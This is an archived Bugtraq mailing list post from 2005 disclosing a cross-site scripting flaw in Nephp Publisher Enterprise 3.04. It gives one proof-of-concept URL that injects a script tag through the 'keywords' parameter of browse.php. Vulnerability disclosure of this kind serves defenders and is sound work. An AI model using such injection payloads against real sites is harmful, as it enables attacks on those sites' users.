Bugtraq mailing list archives
Nephp Publisher Enterprise 3.04 Cross Site Scripting
From: bl2k () shabgard org
Date: 22 Aug 2005 06:04:37 -0000
Program Name : Nephp Publisher Enterprise Release Version : 3.04 Home : http://www.nephp.com Type : Validation Description : Vulnerable to Cross Site Scripting (XSS) attacks. ------------------------------------------------------------------------- example : /nephp/browse.php?mod=find&keywords='%3E%3Cscript%3Ealert('test');%3C/script%3E bl2k Greetz : strcpy,Hergy,magic,mouse,Littlehacker ... www.shabgard.org
Current thread:
- Nephp Publisher Enterprise 3.04 Cross Site Scripting bl2k (Aug 22)